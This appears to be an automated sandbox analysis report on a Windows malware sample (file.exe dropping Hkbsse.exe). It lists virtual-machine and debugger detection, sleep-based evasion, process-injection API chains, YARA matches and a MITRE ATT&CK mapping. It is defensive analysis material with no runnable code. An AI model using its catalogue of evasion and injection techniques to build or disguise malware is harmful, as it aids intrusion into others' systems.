                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeThread delayed: delay time: 180000
                Source: C:\Users\user\Desktop\file.exeAPI coverage: 2.9 %
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeAPI coverage: 1.6 %
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeAPI coverage: 7.3 %
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe TID: 2024Thread sleep count: 51 > 30
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe TID: 2024Thread sleep time: -1530000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe TID: 6288Thread sleep time: -540000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe TID: 2024Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043DCB0 FindFirstFileExW,0_2_0043DCB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044FDF17 FindFirstFileExW,0_2_044FDF17
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0043DCB0 FindFirstFileExW,23_2_0043DCB0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044BDF17 FindFirstFileExW,23_2_044BDF17
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0043DCB0 FindFirstFileExW,33_2_0043DCB0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0454DF17 FindFirstFileExW,33_2_0454DF17
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407DA0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_00407DA0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeThread delayed: delay time: 30000
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeThread delayed: delay time: 180000
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeThread delayed: delay time: 30000
                Source: Amcache.hve.4.drBinary or memory string: VMware
                Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002C0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: file.exe, Hkbsse.exe.0.dr, 9f93a2.33.dr, random[1].exe.33.drBinary or memory string: hGfS:=
                Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00436BBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00436BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042C0A9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042C0A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043A3A2 mov eax, dword ptr fs:[00000030h]0_2_0043A3A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043663B mov eax, dword ptr fs:[00000030h]0_2_0043663B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0295FC4B push dword ptr fs:[00000030h]0_2_0295FC4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044FA609 mov eax, dword ptr fs:[00000030h]0_2_044FA609
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044C0D90 mov eax, dword ptr fs:[00000030h]0_2_044C0D90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044F68A2 mov eax, dword ptr fs:[00000030h]0_2_044F68A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044C092B mov eax, dword ptr fs:[00000030h]0_2_044C092B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0043A3A2 mov eax, dword ptr fs:[00000030h]23_2_0043A3A2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0043663B mov eax, dword ptr fs:[00000030h]23_2_0043663B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_02891AFB push dword ptr fs:[00000030h]23_2_02891AFB
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044BA609 mov eax, dword ptr fs:[00000030h]23_2_044BA609
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_04480D90 mov eax, dword ptr fs:[00000030h]23_2_04480D90
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044B68A2 mov eax, dword ptr fs:[00000030h]23_2_044B68A2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0448092B mov eax, dword ptr fs:[00000030h]23_2_0448092B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0043A3A2 mov eax, dword ptr fs:[00000030h]33_2_0043A3A2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0043663B mov eax, dword ptr fs:[00000030h]33_2_0043663B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_02B63E0B push dword ptr fs:[00000030h]33_2_02B63E0B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0454A609 mov eax, dword ptr fs:[00000030h]33_2_0454A609
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_04510D90 mov eax, dword ptr fs:[00000030h]33_2_04510D90
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_045468A2 mov eax, dword ptr fs:[00000030h]33_2_045468A2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0451092B mov eax, dword ptr fs:[00000030h]33_2_0451092B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0043EF06 GetProcessHeap,33_2_0043EF06
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041D2F7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041D2F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00436BBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00436BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DCB5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041DCB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DE1A SetUnhandledExceptionFilter,0_2_0041DE1A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044DD55E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_044DD55E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044F6E25 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_044F6E25
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044DDF1C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_044DDF1C
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0041D2F7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0041D2F7
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_00436BBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00436BBE
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0041DCB5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0041DCB5
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0041DE1A SetUnhandledExceptionFilter,23_2_0041DE1A
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0449D55E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0449D55E
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044B6E25 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_044B6E25
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0449DF1C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0449DF1C
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_00436BBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00436BBE
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0041D2F7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_0041D2F7
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0041DCB5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0041DCB5
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0041DE1A SetUnhandledExceptionFilter,33_2_0041DE1A
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0452D55E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_0452D55E
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_04546E25 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_04546E25
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0452DF1C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0452DF1C

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407110 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,0_2_00407110
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe"
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DEA1 cpuid 0_2_0041DEA1
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3bca58cece\9f93a2 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3bca58cece\9f93a2 VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A9D9 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,0_2_0040A9D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B170 GetUserNameA,0_2_0040B170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004425B7 _free,_free,_free,GetTimeZoneInformation,_free,0_2_004425B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407DA0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_00407DA0
                Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: 23.3.Hkbsse.exe.4530000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.Hkbsse.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.3.Hkbsse.exe.4530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.3.Hkbsse.exe.4580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.44c0e67.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.Hkbsse.exe.4480e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.Hkbsse.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.Hkbsse.exe.4480e67.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.3.Hkbsse.exe.4580000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.Hkbsse.exe.4510e67.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.4530000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.Hkbsse.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.4530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.Hkbsse.exe.4510e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.Hkbsse.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.44c0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000021.00000003.2753930004.0000000004580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000003.2238394423.0000000004530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2880062670.0000000004510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2134722904.0000000004530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2878258243.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042E062 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_0042E062
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042ED59 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_0042ED59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044EE2C9 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_044EE2C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044EEFC0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_044EEFC0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0042E062 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,23_2_0042E062
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0042ED59 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,23_2_0042ED59
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044AE2C9 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,23_2_044AE2C9
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044AEFC0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,23_2_044AEFC0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0042E062 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,33_2_0042E062
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_00402400 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,33_2_00402400
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0042ED59 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,33_2_0042ED59
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0453E2C9 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,33_2_0453E2C9
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0453EFC0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,33_2_0453EFC0
                MITRE ATT&CK Matrix (techniques per tactic; a leading number is the page's count beside that technique)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: 1 Windows Management Instrumentation; 1 Scheduled Task/Job; 1 Native API; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 111 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 21 Masquerading; 31 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading; Indicator Removal from Tools
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 2 System Time Discovery; 41 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 2 File and Directory Discovery; 35 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 11 Encrypted Channel; 2 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Behavior Graph ID: 1470923, Sample: file.exe, Start date: 10/07/2024, Architecture: WINDOWS, Score: 100

                Root node
